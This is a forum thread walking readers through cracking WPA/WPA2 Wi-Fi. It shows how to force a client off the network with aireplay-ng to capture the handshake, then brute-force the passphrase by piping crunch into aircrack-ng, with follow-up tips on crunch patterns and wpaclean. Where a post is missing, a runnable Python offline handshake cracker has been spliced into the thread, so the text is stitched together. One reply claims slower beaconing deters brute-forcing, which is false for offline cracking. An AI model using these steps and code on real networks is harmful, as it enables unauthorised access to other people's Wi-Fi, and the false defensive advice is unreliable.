Crunch & Aircrack-ng to Avoid Wordlists

Discussion in 'Dictionary, Password & Wordlists' started by mrmanuelmtz, 29 Aug 2012.

  1. mrmanuelmtz (Well-Known Member)
    Well, this post is because I am tired of these dictionary files that are constantly increasing in size, to the point where they cease to be portable, so instead of buying a higher-capacity USB memory stick I decided to do some research, and I think this is a great option to use as a last resort, as this is a brute-force method.

    So, as the title says, the programs to use are the aircrack-ng suite and crunch.

    That said...

    First we put our wireless card in monitor mode (open a root shell window):
    Code:
    airmon-ng start wlan0
    airodump-ng mon0    (or ath1, or ...)
    • The card will start listening for networks; wait until your ESSID appears, which has to be WPA or WPA2 encrypted.
    • Mine is INFINITUMCBA277, so select yours.
    • Now that you have the MAC address and the channel number:
    Code:
    airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0
    • It should look like this:
    Code:
    airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0
    • So now we either wait forever for a handshake, or we can deauthenticate a client to obtain one.
    • In order to do that we must have the MAC of the client:
    Code:
    aireplay-ng -0 10 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0
    • It should look like this:
    Code:
    aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70:D4:F2:91:AE:67 mon0
    • Once the user is deauthenticated and reconnects, we'll obtain the handshake.
    • If the command didn't work, well... try again (if after you ran the deauthenticate command nothing seems to happen, maybe you are too far from the client, because this command goes directly to the client's connection). :(
    • You will see something like: WPA handshake: 58:98:35:CB:A2:77
    • So now we use crunch.
    • We will use the *.cap file where the handshake was saved.
    • Usually in Xiaopan OS it is in /home/tc/.
    • So the syntax is:
    Code:
    crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'YOURMACADDRESS' -w -
    • It should look like this:
    Code:
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    Then you just have to wait for crunch and aircrack-ng to verify each combination.

    I highlight the last command because I want to explain it, so you can adapt the program to your needs:

    Code:
    crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -
    • So we start with the first instruction: crunch is the wordlist generator.
      • crunch 8 8
    • Second: the '8 8' is the length of the word in characters; the first '8' indicates the starting length and the second '8' the ending length. So if you want to test your security with a 16-character password you can change it to '16 16', or '8 16'.
      • crunch 8 8 0123456789
    • Third: '0123456789' is the list of characters to include in the wordlist, for a numeric password. Note: 75% of users use numeric passwords. But you can also try something like '01234567890abcdefghijklf'; by using an alphanumeric wordlist the time will increase, as this is a brute-force method.
      • 0123456789 | aircrack-ng
    • Fourth: this symbol is very important --> | <-- as it indicates the end of the instructions for crunch and the start of the instructions for aircrack-ng.
    • Last but not least: the location of the .cap file has to be accurate.
    Well, there are a lot of programs that do things like this; I just like it better to do it myself. Well, this is it, let me know if you find this post useful.
     
  2. Mr. Penguin (Administrator, Staff Member)
    Really impressive, I think that this would interest hazz death quite a lot.
     
  3. hazz death (Well-Known Member, Dev Team VIP)
    Thanks for tagging me. Yes, it's really impressive! :D Thanks for sharing, mrmanuelmtz.
     
  4. ihack (Member)
    Just curious: the Wi-Fi that I was trying to crack had the CCMP cipher, so my question is whether it is possible to crack a network with a CCMP cipher using the above method, or does it have to be a WEP or TKIP cipher?
     
  5. mrmanuelmtz (Well-Known Member)
    Well, this method is for WPA/WPA2 networks, so a CCMP cipher is still WPA/WPA2. Just remember that this method is a brute force, so if you are looking to have a more secure network and your router supports it, set it to only beacon once a second; that should deter anyone trying to brute-force.
     
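What aircrack-ng actually does with every line that crunch pipes into it in the command from the first post, and why the CCMP question above has the answer it does, as an added example that is not part of any post in this thread and not code from aircrack-ng or crunch. The handshake is constructed in make_handshake() from a known passphrase so the script runs offline; the SSID, MAC addresses and nonces are made-up values, and candidates() is a stand-in for crunch (including the -t pattern form used later in the thread), not crunch itself.

```python
"""What aircrack-ng does with every line crunch pipes into it: derive the
WPA/WPA2 keys from the candidate passphrase and compare the resulting MIC
with the one captured in the 4-way handshake.  Added example for this
thread, not code from the original post or from aircrack-ng/crunch.  The
handshake is constructed below from a known passphrase; SSID, MACs and
nonces are made-up values."""
import hashlib
import hmac
import itertools


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what makes each candidate cost real CPU time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def kck(pmk_, ap, sta, anonce, snonce):
    """Key Confirmation Key: first 16 bytes of the PTK, used to sign EAPOL frames."""
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck_, eapol, key_version):
    """MIC over the EAPOL-Key frame with its MIC field zeroed.  Key descriptor
    version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1 cut
    to 16 bytes; the PMK/PTK derivation above is the same for both."""
    if key_version == 1:
        return hmac.new(kck_, eapol, hashlib.md5).digest()
    return hmac.new(kck_, eapol, hashlib.sha1).digest()[:16]


def candidates(min_len, max_len, charset, pattern=None):
    """Stand-in for crunch: every string of length min_len..max_len over charset,
    or, when a pattern is given, only the '@' positions vary (like crunch -t)."""
    if pattern is not None:
        slots = [i for i, c in enumerate(pattern) if c == "@"]
        for fill in itertools.product(charset, repeat=len(slots)):
            word = list(pattern)
            for i, ch in zip(slots, fill):
                word[i] = ch
            yield "".join(word)
        return
    for n in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=n):
            yield "".join(tup)


def keyspace(min_len, max_len, charset):
    """How many lines crunch will emit for those arguments."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))


def crack(hs, words):
    """Return the first candidate whose derived MIC matches the captured MIC,
    or None when the passphrase is not in the stream (aircrack-ng's
    'Passphrase not in dictionary')."""
    for word in words:
        k = kck(pmk(word, hs["ssid"]), hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(k, hs["eapol"], hs["key_version"]), hs["mic"]):
            return word
    return None


def make_handshake(passphrase, key_version=2):
    """Constructed handshake: message 2 of the 4-way handshake (SNonce from the
    client) plus the MIC a real client would have computed with this
    passphrase.  All values are made up for the example."""
    ssid = "EXAMPLE-AP"
    ap = bytes.fromhex("58983500a277")            # constructed BSSID
    sta = bytes.fromhex("70d4f200ae67")           # constructed client MAC
    anonce = hashlib.sha256(b"anonce").digest()   # 32-byte nonces
    snonce = hashlib.sha256(b"snonce").digest()
    key_info = (0x0108 | key_version).to_bytes(2, "big")   # pairwise + MIC bit + version
    eapol = (b"\x02\x03\x00\x5f"                  # EAPOL header: version, Key type, body length
             + b"\x02" + key_info + b"\x00\x10"   # RSN descriptor, key info, key length
             + b"\x00" * 8 + snonce               # replay counter, nonce
             + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
             + b"\x00" * 16 + b"\x00\x00")        # zeroed MIC field, data length
    k = kck(pmk(passphrase, ssid), ap, sta, anonce, snonce)
    return {"ssid": ssid, "ap": ap, "sta": sta, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "key_version": key_version,
            "mic": eapol_mic(k, eapol, key_version)}


if __name__ == "__main__":
    print("crunch 8 8 0123456789 would emit", keyspace(8, 8, "0123456789"), "candidates")
    hs = make_handshake("20120829")
    # Narrow the stream the way crunch -t would, so the demo finishes in seconds.
    print("found:", crack(hs, candidates(8, 8, "0123456789", pattern="20120@@@")))
```

Two things the code makes concrete. First, the cost is in pmk(): 4096 PBKDF2 rounds per candidate, with the SSID as salt, so nothing can be precomputed across networks with different names. crunch 8 8 0123456789 yields 10^8 candidates, and at an assumed 1,000 keys per second that is about 10^5 seconds, roughly 28 hours, for digits only; keyspace(8, 16, ...) over 36 characters shows why the alphanumeric range in the first post is not a realistic last resort. Second, eapol_mic() is the only place the cipher matters: CCMP versus TKIP changes which HMAC checks the MIC, not the passphrase derivation, so a CCMP network is attacked exactly the same way, as the reply above says. A candidate that is in the stream but still reports "not in dictionary" is usually a capture problem (wrong SSID, or a cap file with mixed or incomplete handshake frames), which is what wpaclean later in the thread fixes.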
  7. nonameinthenet
    Thanks for the guide, I'll try this.
     
  8. vampiricbunny1800 (Well-Known Member, Dev Team VIP)
    Let me see if I am on the same page... when you say crunch and type the letters, it makes the list from those? So crunch 8 8 abc will make 8-letter words only using those 3 letters? Or did I misread something?
     
  10. vampiricbunny1800 (Well-Known Member, Dev Team VIP)
    How fast is this? The same as a dic file, or faster? I am currently hashing a 40 GB file... I have another 27 GB dic file... If this is faster I'd much prefer this. Also, can you do a BT (GNOME) walkthrough on it, or is it the same thing?
     
  11. mrmanuelmtz (Well-Known Member)
    A: Yes, that's exactly how it works, but for a 3-letter combination you don't need a program :)
     
  12. tuyhin (Member)
    How do you type --> | <--?
     
  13. vampiricbunny1800 (Well-Known Member, Dev Team VIP)
    Thank you, that was informative. I will try that later; I will have to do all letters and numbers though, I have a HUGE password.
    --- Double Post Merged, 19 Nov 2012 ---
    @mrmanuelmtz, alt+179 = │
     
  14. estimacamry (Tracker, VIP)
    Guys,
    I managed to create a wordlist with Crunch. My passphrase is abkcmtshab. In order to shorten my pentest time I used:
    Code:
    /pentest/passwords/crunch/crunch 10 10 abchkmst -t abkc@@@@@@ -o <name.txt>
    The list is only 1 MB. After the 4-way handshake I started aircrack. Final result: Passphrase not in dictionary!
    How could this be? I double-checked to make sure abkcmtshab is in my txt file before starting aircrack. Anyone care to explain? :(
    Problem solved after running wpaclean on my cap file.
     
  15. x_mony (Guest)

    Hi mrmanuelmtz, I like your idea of crunch and aircrack instead of a wordlist, but I don't know when you are opening a new root shell each time. Can you specify when you open a new root shell? And where should the handshake appear? Please specify this to me also. Thanks very much in advance.
     
  16. ImJoJo (The One & Only, VIP)
    | is on the key above "Enter", under "Backspace", the same key as the \ backslash; Shift + \ will give you |.
     
  17. x_mony (Guest)

    Aircrack started trying the PINs and everything worked fine, but when the current passphrase reached the same numbers as my password nothing happened and it continued trying combinations.
    --- Double Post Merged, 12 Dec 2012 ---
    Hi mrmanuelmtz, your method worked with my Ralink; just wondering, does it work with the built-in Wi-Fi of the laptop? Thanks in advance.
     
  18. estimacamry (Tracker, VIP)
    x_mony,
    Clean up your cap file before starting aircrack:
    Code:
    wpaclean <out.cap> <in.cap>
     
  19. x_mony (Guest)

    Thanks for the reply.
    --- Double Post Merged, 9 Jan 2013 ---
    Hi, mrmanuelmtz said: "Well, there are a lot of programs that do things like this, I just like it better to do it myself." Does anyone know a program that uses crunch and aircrack-ng automatically, without the need to write all these commands? Thanks in advance.
     
  20. epitomize (Active Member)
    Can you put crunch on minidwep? ~_~
    { hoho }
     
